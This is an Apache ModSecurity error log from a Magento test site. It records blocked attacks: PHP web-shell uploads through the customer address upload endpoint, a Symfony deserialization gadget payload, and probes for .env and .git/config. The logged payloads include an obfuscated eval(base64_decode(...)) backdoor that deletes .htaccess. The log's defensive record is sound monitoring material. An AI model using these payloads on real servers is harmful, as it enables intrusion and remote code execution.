[severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.phar"] [unique_id "aSv-Ei6tRBnriPIR7Vg5FgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 09:19:30.805240 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.phar"] [unique_id "aSv-Ei6tRBnriPIR7Vg5FgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 09:19:30.805431 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.phar"] [unique_id "aSv-Ei6tRBnriPIR7Vg5FgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 09:19:30.959607 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: m488364f428d25.php8 found within FILES:custom_attributes[country_id]: m488364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSv-Ei6tRBnriPIR7Vg5FwAAAAw"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/4/m488364f428d25.phar
[Sun Nov 30 09:19:30.960270 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSv-Ei6tRBnriPIR7Vg5FwAAAAw"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/4/m488364f428d25.phar
[Sun Nov 30 09:19:30.960457 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSv-Ei6tRBnriPIR7Vg5FwAAAAw"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/4/m488364f428d25.phar
[Sun Nov 30 09:19:31.027377 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Rule 7ffbb7073be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.php8"] [unique_id "aSv-Ey6tRBnriPIR7Vg5GAAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 09:19:31.027846 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.php8"] [unique_id "aSv-Ey6tRBnriPIR7Vg5GAAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 09:19:31.030291 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.php8"] [unique_id "aSv-Ey6tRBnriPIR7Vg5GAAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 09:19:31.030498 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.php8"] [unique_id "aSv-Ey6tRBnriPIR7Vg5GAAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 12:31:07.880400 2025] [:error] [pid 427776] [client 134.195.198.119:53144] [client 134.195.198.119] ModSecurity: Warning. Found 30 byte(s) in ARGS:_path outside range: 1-255. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "482"] [id "920270"] [msg "Invalid character in request (null character)"] [data "ARGS:_path=_controller=Symfony\\x5cComponent\\x5cYaml\\x5cInline::parse&value=!!php/object:a:1:{i:1;a:2:{i:0;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;N;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:2:\\x22-1\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_fragment"] [unique_id "aSwq-xlsVScx5wrU222RZQAAACk"]
[Sun Nov 30 16:59:14.205480 2025] [authz_core:error] [pid 427804] [client 206.81.24.74:36490] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 30 16:59:15.578271 2025] [:error] [pid 429215] [client 206.81.24.74:36504] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSxp09S7rIt1xMi8OZXl4AAAAAE"]
[Sun Nov 30 16:59:15.578533 2025] [:error] [pid 429215] [client 206.81.24.74:36504] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSxp09S7rIt1xMi8OZXl4AAAAAE"]
[Sun Nov 30 16:59:15.578693 2025] [:error] [pid 429215] [client 206.81.24.74:36504] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSxp09S7rIt1xMi8OZXl4AAAAAE"]
[Sun Nov 30 16:59:15.942947 2025] [:error] [pid 421122] [client 206.81.24.74:36506] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSxp0y6tRBnriPIR7Vg5rQAAAAw"]
[Sun Nov 30 16:59:15.943250 2025] [:error] [pid 421122] [client 206.81.24.74:36506] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSxp0y6tRBnriPIR7Vg5rQAAAAw"]
[Sun Nov 30 16:59:15.943526 2025] [:error] [pid 421122] [client 206.81.24.74:36506] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSxp0y6tRBnriPIR7Vg5rQAAAAw"]
[Sun Nov 30 16:59:16.129303 2025] [:error] [pid 427776] [client 206.81.24.74:58802] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSxp1BlsVScx5wrU222RgQAAACk"]
[Sun Nov 30 16:59:16.129532 2025] [:error] [pid 427776] [client 206.81.24.74:58802] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSxp1BlsVScx5wrU222RgQAAACk"]
[Sun Nov 30 16:59:16.129703 2025] [:error] [pid 427776] [client 206.81.24.74:58802] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSxp1BlsVScx5wrU222RgQAAACk"]
[Mon Dec 01 03:03:59.590191 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Rule 7fc9236c5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.phar"] [unique_id "aSz3jyhioTxII1yPdFPiYAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 03:03:59.590855 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.phar"] [unique_id "aSz3jyhioTxII1yPdFPiYAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 03:03:59.595399 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.phar"] [unique_id "aSz3jyhioTxII1yPdFPiYAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 03:03:59.595667 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.phar"] [unique_id "aSz3jyhioTxII1yPdFPiYAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 03:03:59.661852 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: j288364f428d25.php8 found within FILES:custom_attributes[country_id]: j288364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSz3jyhioTxII1yPdFPiYQAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/2/j288364f428d25.phar
[Mon Dec 01 03:03:59.662557 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSz3jyhioTxII1yPdFPiYQAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/2/j288364f428d25.phar
[Mon Dec 01 03:03:59.662743 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSz3jyhioTxII1yPdFPiYQAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/2/j288364f428d25.phar
[Mon Dec 01 03:03:59.738675 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Rule 7fc9236c5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.php8"] [unique_id "aSz3jyhioTxII1yPdFPiYgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 03:03:59.739159 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.php8"] [unique_id "aSz3jyhioTxII1yPdFPiYgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 03:03:59.741603 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.php8"] [unique_id "aSz3jyhioTxII1yPdFPiYgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 03:03:59.741796 2025] [:error] [pid 441953] [client 185.65.202.110:59518] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/2/j288364f428d25.php8"] [unique_id "aSz3jyhioTxII1yPdFPiYgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 20:38:55.282893 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Rule 7fc9236c5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.phar"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 20:38:55.283477 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.phar"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 01 20:38:55.286264 2025] [:error] [pid 441954] [client 138.124.117.56:42126] [client 138.124.117.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/r/cr88364f428d25.phar"] [unique_id "aS3uz3ijrbz5Mx7E72Y8iQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
